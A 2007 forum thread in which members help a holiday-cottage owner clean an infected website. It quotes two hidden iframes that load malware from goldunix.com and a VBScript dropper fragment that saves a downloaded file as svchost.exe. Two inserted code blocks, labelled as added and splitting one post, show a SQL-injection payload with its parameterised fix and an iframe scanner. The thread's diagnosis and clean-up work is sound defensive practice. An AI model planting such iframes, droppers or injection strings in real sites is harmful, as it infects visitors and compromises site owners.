The 75 and ZT Owners Club Forums > Social Forums > Technology Forum
16th April 2007, 18:33   #1
martin1973
Urgent help regarding malware virus on website

Hi

I've my own business and website www.goosemirecottages.co.uk and received the following email:

-
Hi
I am looking for accommodation in the Lake District and landed on your web
site. The following link
http://www.goosemirecottages.co.uk/s...pertyID=447176
resulted in a virus report from 2 different anti-virus products. The file in
question is hker[1].htm. The suspected virus is called Exploit-MS06-014
(Trojan).
Any thoughts?
Regards
Tony
--

Anyway I checked the link and there is a virus which Kaspersky picks up, but it seems to be on all of the site's pages.

Could the email have been a hoax and downloaded a virus onto the site? Any other idea how a virus could be put onto the site, and how could it be removed?

Thanks for your help
16th April 2007, 18:55   #2
Rich

Not picking up any virus warnings from that URL (that doesn't mean to say that it's "clean" though).

One thing to note straight away: the site is open to SQL injection, and therefore anything is possible.

Get it secured asap Martin!
16th April 2007, 19:01   #3
GreyGhost

Not really familiar, but would you expect to see these two lines of code on your home and other pages?

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
16th April 2007, 19:01   #4
Rich

And slightly off topic, did you know that kate@netizen is getting a copy of every "contact us" form filled in?
16th April 2007, 19:03   #5
Rich

Quote:
Originally Posted by Grey Ghost View Post
Not really familiar, but would you expect to see these two lines of code on your home and other pages?

<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
Gotta love Firefox, that's why I wasn't seeing anything bad.

FYI Martin, the hker.htm file tries to do some very naughty things:

Quote:
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
16th April 2007, 19:06   #6
GreyGhost

Would deleting those lines resolve the problem?

Safari BTW.
16th April 2007, 19:09   #7
Rich

Quote:
Originally Posted by Grey Ghost View Post
Would deleting those lines resolve the problem?
Sure would; those two lines are calling the malware scripts from the goldunix.com site.

Any number of ways your site could have become infected, Martin, but I'd start by first securing the SQL vulnerabilities, as people can currently inject anything they want into your site.

Safari
16th April 2007, 19:11   #8
GreyGhost

In any event, keep a clean copy to upload and replace the current one if this or any other problem occurs.
16th April 2007, 19:20   #9
martin1973

Can I have a swear filter switched on briefly? Some spotty gimp will have been sat at home with his porn mags and flask of orange juice all night hatching this evil plan; they should cut their hands off!

Rant over for now...

Thanks for the replies guys

Rich - what is SQL injection and how do you secure the site from this?
(Have checked on the laptop and got Dad to check the site on his PC, and all get the same virus warning. All PCs are running Kaspersky, but it can't just be a virus on my system; it must be within the site pages.)

--
GreyGhost - no, those lines of code shouldn't be on the pages. When I go onto the site a Kaspersky warning window pops up with malware - Exploit.JS.ADODB.Stream.y
file - http://www.goldunix.com/hker.htm

Which explains the lines of dodgy text you noticed referring to goldunix.

--
Rich - yes, Netizen were the original site designers; they get a copy of all enquiry forms, so nothing to worry about there (came in handy, as when I was with AOL a few years ago they were filtering out loads of the enquiries, thinking they were spam emails; in 3 weeks I hadn't received over 100 enquiries, so I soon booted AOL out. AOL spam filters see email addresses like [email protected] or [email protected] as spam).

-
Rich again :lol: What exactly are the files trying to do?

--

OK, so any idea, guys, how I remove the nasties? And any idea how they got on the site in the first place, and how can it be made more secure?
16th April 2007, 19:32   #10
GreyGhost
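An added example, not from any poster in the thread, of the SQL injection Rich warns about and Martin asks about: a property lookup that pastes the URL parameter straight into the query, beside one that validates and binds it. The table, column names and the numeric parameter (modelled on the ID in the URL Tony reported) are assumptions, since the site's own code is not shown in the thread.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the site's property table; the real schema is not in the thread.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE property (id INTEGER PRIMARY KEY, name TEXT, published INTEGER)")
    db.executemany("INSERT INTO property VALUES (?, ?, ?)",
                   [(447176, "Sample cottage", 1), (447177, "Unpublished draft", 0)])
    return db

def lookup_vulnerable(db, property_id):
    # The value taken from the URL is pasted straight into the SQL text, so whatever a
    # visitor types after "ID=" becomes part of the statement the database executes.
    sql = f"SELECT id, name FROM property WHERE id = {property_id} AND published = 1"
    return db.execute(sql).fetchall()

def lookup_safe(db, property_id):
    # 1) A property ID can only be a number: reject anything else before it reaches the database.
    value = str(property_id).strip()
    if not re.fullmatch(r"\d{1,10}", value):
        return []
    # 2) Bind the value as a parameter: the driver passes it as data, never as SQL syntax.
    return db.execute("SELECT id, name FROM property WHERE id = ? AND published = 1",
                      (int(value),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    crafted = "447176 OR 1=1 --"   # a visitor-controlled value that rewrites the WHERE clause
    print("vulnerable:", lookup_vulnerable(db, crafted))   # every row, including the unpublished one
    print("safe:", lookup_safe(db, crafted))               # [] - the input is rejected as non-numeric
```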

Either download the site and delete both lines of code from each page, then upload again, replacing the live site.
Or remove the live site altogether and upload your backup clean copy of your site.
It is those two lines that are compromising your site.

Rich will advise on protection.
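An added example, not from any poster, of doing GreyGhost's clean-up by script over a downloaded copy of the site: it flags iframes that are zero-sized (including the attacker's "widht" misspelling) or that point off-site, and can strip them so the cleaned pages can be re-uploaded. The sample page is constructed from the two lines quoted in the thread; the own-site host name is taken from Martin's post, and the file extensions scanned are an assumption.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample page modelled on the two injected lines quoted in the thread
# ("widht" typo kept on purpose); the booking iframe stands in for a legitimate one.
SAMPLE_HTML = """<html><body>
<iframe src=http://www.goldunix.com/xiao/index.htm widht=0 height=0></iframe>
<iframe src=http://www.goldunix.com/hker.htm widht=0 height=0></iframe>
<iframe src="/booking.htm" width="400" height="300"></iframe>
</body></html>"""
OWN_HOSTS = ("www.goosemirecottages.co.uk", "goosemirecottages.co.uk")
# An <iframe ...></iframe> pair, or a lone <iframe ...> tag.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>\s*(?:</iframe>)?", re.I)
# name=value with double-quoted, single-quoted or bare values (the injected lines use bare ones).
ATTR_RE = re.compile(r"""([a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)

def parse_attrs(tag):
    # Lower-case attribute names mapped to their unquoted values.
    return {m.group(1).lower(): next(v for v in m.groups()[1:] if v is not None)
            for m in ATTR_RE.finditer(tag)}

def is_suspicious(attrs, own_hosts=OWN_HOSTS):
    # Zero-sized frames are invisible to the visitor; "widht" covers the attacker's typo.
    zero_sized = any(attrs.get(k, "").lower().rstrip("px") == "0" for k in ("width", "widht", "height"))
    host = urlparse(attrs.get("src", "")).hostname or ""
    off_site = bool(host) and host not in own_hosts
    return zero_sized or off_site

def find_hidden_iframes(html, own_hosts=OWN_HOSTS):
    # Returns (line_number, src) for every suspicious iframe in one page.
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(0))
        if is_suspicious(attrs, own_hosts):
            hits.append((html.count("\n", 0, m.start()) + 1, attrs.get("src", "")))
    return hits

def strip_hidden_iframes(html, own_hosts=OWN_HOSTS):
    # Removes suspicious iframes and leaves legitimate ones untouched.
    return IFRAME_RE.sub(lambda m: "" if is_suspicious(parse_attrs(m.group(0)), own_hosts)
                         else m.group(0), html)

def scan_tree(root, exts=(".htm", ".html", ".asp", ".php"), own_hosts=OWN_HOSTS):
    # Walks a downloaded copy of the site and maps each affected file to its findings.
    report = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in exts:
            hits = find_hidden_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report
```

Run scan_tree over the downloaded site to list every affected file before deciding whether to strip the frames or restore from the clean backup.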